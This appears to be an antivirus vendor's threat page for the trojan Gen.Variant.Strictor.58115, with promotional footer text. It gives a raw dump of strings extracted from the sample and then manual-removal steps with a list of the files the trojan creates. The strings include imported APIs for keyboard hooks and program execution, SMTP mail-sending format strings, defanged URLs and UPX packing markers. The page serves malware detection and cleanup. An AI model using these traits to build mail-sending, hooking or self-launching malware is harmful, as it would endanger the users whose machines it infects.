CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:6BCCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:31:24 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>

S%XW(=

2013:11:02 22:34:01

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-11-02T22:32:16 08:00" xmp:ModifyDate="2013-11-02T22:34:01 08:00" xmp:MetadataDate="2013-11-02T22:34:01 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:2FB030D1CB43E31193368B624B8663A2" xmpMM:DocumentID="xmp.did:2FB030D1CB43E31193368B624B8663A2" xmpMM:OriginalDocumentID="xmp.did:2FB030D1CB43E31193368B624B8663A2"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2FB030D1CB43E31193368B624B8663A2" stEvt:when="2013-11-02T22:32:16 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>

4.GRN

qW#Z%u

2014:01:08 17:17:20

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T17:17:20 08:00" xmp:MetadataDate="2014-01-08T17:17:20 08:00" xmp:ModifyDate="2014-01-08T17:17:20 08:00" xmpMM:InstanceID="xmp.iid:DC6B5A084578E311939AD53276E77662" xmpMM:DocumentID="xmp.did:DB6B5A084578E311939AD53276E77662" xmpMM:OriginalDocumentID="xmp.did:DB6B5A084578E311939AD53276E77662" dc:format="image/jpeg" photoshop:ColorMode="3"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:DB6B5A084578E311939AD53276E77662" stEvt:when="2014-01-08T17:17:20 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:DC6B5A084578E311939AD53276E77662" stEvt:when="2014-01-08T17:17:20 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>

2014:01:08 17:12:43

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T17:12:43 08:00" xmp:MetadataDate="2014-01-08T17:12:43 08:00" xmp:ModifyDate="2014-01-08T17:12:43 08:00" xmpMM:InstanceID="xmp.iid:DA6B5A084578E311939AD53276E77662" xmpMM:DocumentID="xmp.did:D96B5A084578E311939AD53276E77662" xmpMM:OriginalDocumentID="xmp.did:D96B5A084578E311939AD53276E77662" dc:format="image/jpeg" photoshop:ColorMode="3"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:D96B5A084578E311939AD53276E77662" stEvt:when="2014-01-08T17:12:43 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:DA6B5A084578E311939AD53276E77662" stEvt:when="2014-01-08T17:12:43 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>

%2%(,-/0/

#484.7*./.

5].fk[

}35.RBRT

8EI%D

2013:06:08 18:11:32

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-06-08T18:10:22 08:00" xmp:ModifyDate="2013-06-08T18:11:32 08:00" xmp:MetadataDate="2013-06-08T18:11:32 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:308150CB23D0E211AEC8999F2ABD2F9F" xmpMM:DocumentID="xmp.did:2F8150CB23D0E211AEC8999F2ABD2F9F" xmpMM:OriginalDocumentID="xmp.did:2F8150CB23D0E211AEC8999F2ABD2F9F"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2F8150CB23D0E211AEC8999F2ABD2F9F" stEvt:when="2013-06-08T18:10:22 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="converted" stEvt:parameters="from image/png to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:308150CB23D0E211AEC8999F2ABD2F9F" stEvt:when="2013-06-08T18:11:32 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>

VVV.cf089.com/

.htmlr

1258095550

5|M%U8

VVV.vdisk.cn/wushu8

2755350288

1314520.

%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

iphlpapi.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

WSOCK32.dll

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.*)|*.*||

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

out.prn

%d.%d

%d / %d

%d/%d

Bogus message code %d

(%d-%d):

%ld%c

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

HELO %s

SMTP

AUTH LOGIN

LOGIN

AUTH=LOGIN

EHLO %s

Content-Type: application/octet-stream; name=%s

Content-Disposition: attachment; filename=%s

MAIL FROM:<%s>

RCPT TO:<%s>

VVV.dywt.com.cn

(*.htm;*.html)|*.htm;*.html

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

zcÁ

c:\%original file name%.exe

hX&%suz~

WU%syz~

1111111111111141

#include "l.chs\afxres.rc" // Standard components

$;.zSx

SetViewportExtEx

WS2_32.dll

KERNEL32.dll

GetViewportOrgEx

WinExec

GetViewportExtEx

WININET.dll

GetProcessHeap

GetWindowsDirectoryA

RegCloseKey

ScaleViewportExtEx

SetWindowsHookExA

H{[.yYw

,T<*%D

'.leD]s

:e5%CG

/.Yiw

bo.jb]fU.

ADVAPI32.dll

UWINMM.dll

RegOpenKeyExA

RegCreateKeyExA

GetCPInfo

RASAPI32.dll

CreateDialogIndirectParamA

n;Kd%x

.DmK/j

x|x.xk

.Yj?G

 I.Zg

ß&wM;

EL%C(

.rGmRg

K.Nn>*&I_/E

%SlRJ

TZx.Wv

,".Wa*2E

2w.MD

2n/.QfH

KX5%x

x#.vg

3.jx(

``.jE:

.NAN)

T^L.vD8

isql

W.WV0

F,.hD

%F)ww

%u&xS

PR.Az

.gy{i

4G.vw5

.VI M

I%C- G

P.ZW4x

NSl.zs

^%CNwv|

7.kWf1

H3?%X

[ŸT

%X&J|

es.tC

-5}sB

}d.UI

~.vo\

.sswo

}.ul`

UOP%X!

#W%u$

.RcD7

$%XYy0

m-Yi}

DS.Ei 4

gU%d'9

.eO21

_.vAw,

lt.hA

?.Amn

89>?<=234016

O%dX^

.iM4x

%XeSY

e.lD7

K].Rv

.YTM'g

G0%UG<

[.yY6

]$Gs.xS

^.XCZh

N%c;o

,.DR3

se.Jy

/; %dw

WINSPOOL.DRV

oledlg.dll

GetKeyState

SHELL32.dll

]Þ?

(='fuqg.Cg

8.BBS

n%uJoN

#.klH

%DK )

]%DIb

)u^e.JO

.Kt*?

e<=Å

5%Cw3

M%ubdt

U'K.kj

pA"%c

/ÔT!

 z.dS

Þo!

{D%f$

'0SSh

,.Hq_w

Z.Wd4

/%dQ/ngt

d[[.kU

O%uvl$

n^.ot

`gbuJ*%D

>ag%dW

[email protected]

zd)%s(m

pm%U%!

O %cJ3

ke%Cng

U.uC<

'%d!2>=

.aTpe

1eÛ

g9.gqJo

".nGlJ

y%Dg>:#B

w(KN`k%F

SetViewportOrgEx

ShellExecuteA

vU.IS

UnhookWindowsHookEx

OffsetViewportOrgEx

D].hN:

comdlg32.dll

OLEAUT32.dll

1, 0, 6, 6

20130907181933

(*.*)

%original file name%.exe_664_rwx_00621000_00001000:

SetViewportExtEx

WS2_32.dll

KERNEL32.dll

GetViewportOrgEx

WinExec

GetViewportExtEx

WININET.dll

GetProcessHeap

%original file name%.exe_664_rwx_0077B000_00001000:

ShellExecuteA

%original file name%.exe_664_rwx_10001000_00039000:

L$(h%f

SSh0j

msctls_hotkey32

TVCLHotKey

THotKey

\skinh.she

}uo,x6l5k%x-l h

9p%s m)t4`#b

e"m?c&y1`Ð<

SetViewportOrgEx

SetViewportExtEx

SetWindowsHookExA

UnhookWindowsHookEx

EnumThreadWindows

EnumChildWindows

`c%US.4/

!#$<#$#=

.text

`.rdata

@.data

.rsrc

@.UPX0

`.UPX1

`.reloc

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bd_bg[1].gif (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA98G7TP.html (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Ã‚Â³Ãƒâ€°Ã‚Â¹Ã‚Â¦ÃƒÂÃƒâ€¦ÃƒÂÃ‚Â¢[1].htm (943 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\slave[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CACDY72N.html?partner=bd3 (621 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Ã‚Â³Ãƒâ€°Ã‚Â¹Ã‚Â¦ÃƒÂÃƒâ€¦ÃƒÂÃ‚Â¢[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\domains[1].js (7262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CAC9KN0N.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\t_141_201401111[1].css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\parking_caf_141_1402251[1].js (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\secondtier_caf[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\slave[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\caf[1].js (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CARY3VYG.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\caf[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Ã‚Â³Ãƒâ€°Ã‚Â¹Ã‚Â¦ÃƒÂÃƒâ€¦ÃƒÂÃ‚Â¢[1].htm (761 bytes)
C:\SkinH_EL.dll (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\search_language_1[1].jpg (2 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Strictor.58115_c0c73eaf2b

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Strictor.58115_c0c73eaf2b

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet